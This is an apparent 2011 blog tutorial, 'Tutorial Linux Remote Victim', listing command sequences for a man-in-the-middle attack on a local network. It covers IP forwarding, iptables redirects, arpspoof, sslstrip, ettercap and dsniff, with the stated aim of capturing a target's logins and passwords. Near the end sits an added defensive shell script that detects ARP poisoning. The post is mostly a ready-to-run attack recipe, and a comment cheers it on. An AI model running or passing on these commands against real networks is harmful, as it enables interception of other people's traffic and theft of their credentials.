25/02/2011

Tutorial Linux "Remote Victim"

Running sslstrip
* Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
* Set up iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
http://l0t3k.org/security/tools/loganalysis/
* Run sslstrip. (sslstrip.py -l )
* Run arpspoof (arpspoof -i -t )
* G = Gateway, V = Victim (target)
WARN! Before running arpspoof, start # fragrouter -B1 (IP forwarding)

=========ettercap,arpspoof,sslstrip=================================================
Set up iptables (Linux) to intercept HTTP requests (as root):
nano /etc/etter.conf
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
1# set ip-forward
2# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
3# arpspoof -i wlan0 -t ipGW ipVc
4# python sslstrip.py -l 1000 (new terminal)
5# ettercap -Tq -i wlan0 (new terminal) ...waiting for your target to log in...

Just specify a log file in sslstrip and use the post command.
sslstrip -p -k -w /home/user/ssl.log
~/Desktop/sslstrip-0.2/sslstrip.log
_____________________________________________________________________________________
====================================ettercap=========================================
Edit /etc/etter.conf:
remote-browser = "firefox -remote openurl (http://%host%url)"
To start the attack:
# set IP_Forward
# iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 [2]
# ettercap -i wlan0 -TqM ARP:REMOTE /victim/ /GW/ [3]
# press -h-, activate the REMOTE BROWSER plugin ....bingo..
or
# ettercap -T -Q -M arp:remote -i eth1 /client-ip/ // -P remote_browser

Options
[2]# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
[3]# ettercap -Tq -i wlan0 -M arp:remote,oneway /victim/ //
______________________________________________________________________________________
======================dsniff==========================================================
Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l

e.g.: arpspoof -i interface gateway (arpspoof -i wlan0 10.1.1.1)

T1 arpspoof -i wlan0 -t [G] [V] &
T2 arpspoof -i wlan0 -t [V] [G] &
T3 fragrouter -B1 (normal IP forwarding)

$ dsniff -i wlan0 -w output.txt
$ mailsnarf -i wlan0
$ dsniff -i wlan0 -md
$ dsniff -i wlan0 -n -c
==================================================================================
arpspoof -t G V >/dev/null 2>&1 &
arpspoof -t V G >/dev/null 2>&1 &
#The ">/dev/null 2>&1 &" part is there to make it easier to run from one terminal
Run $ dsniff
As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark.
__________________________________________________________________________________
End all the processes with # killall arpspoof
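
Seen from the victim's side, the two arpspoof commands above leave the gateway's IP bound to the same MAC address as another host in the neighbour table. The following check for that state is an added example, not part of the original post; the sample table, the addresses and the function names arp_conflicts and gateway_spoofed are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag neighbour-table entries where one MAC answers for
# several IPs, the state ARP poisoning leaves on the targeted host.

# Constructed sample of `ip neigh show` output (not from a real network).
# Assumption: 10.1.1.1 is the gateway; 10.1.1.23 shares its MAC.
SAMPLE_NEIGH='10.1.1.1 dev wlan0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.1.1.23 dev wlan0 lladdr 00:0C:29:AA:BB:CC STALE
10.1.1.40 dev wlan0 lladdr 3c:97:0e:11:22:33 REACHABLE
10.1.1.77 dev wlan0  FAILED'

# Read `ip neigh show` lines on stdin; print "MAC ip1,ip2,..." for every MAC
# bound to more than one IP. Entries without an lladdr field are skipped.
arp_conflicts() {
    awk '
    {
        mac = ""
        for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
        if (mac == "") next
        if (mac in ips) ips[mac] = ips[mac] "," $1
        else ips[mac] = $1
        count[mac]++
    }
    END { for (m in count) if (count[m] > 1) print m, ips[m] }' | sort
}

# Return 0 (alert) if the gateway IP in $1 shares its MAC with another IP
# in the table read from stdin, 1 otherwise.
gateway_spoofed() {
    arp_conflicts | awk -v gw="$1" '
    { n = split($2, a, ","); for (i = 1; i <= n; i++) if (a[i] == gw) found = 1 }
    END { exit (found ? 0 : 1) }'
}

# Demo on the constructed sample; on a live host pipe `ip neigh show` instead.
if printf '%s\n' "$SAMPLE_NEIGH" | gateway_spoofed 10.1.1.1; then
    echo "ALERT: gateway 10.1.1.1 shares a MAC with another host:"
    printf '%s\n' "$SAMPLE_NEIGH" | arp_conflicts
fi
```

A router that legitimately holds several IPs on one interface also shows a shared MAC, so compare a hit against the gateway's known hardware address before acting on it.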

From various sources

1 comments:

Anonymous said...

I like this command >> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT to-port 1000 ... hehehehe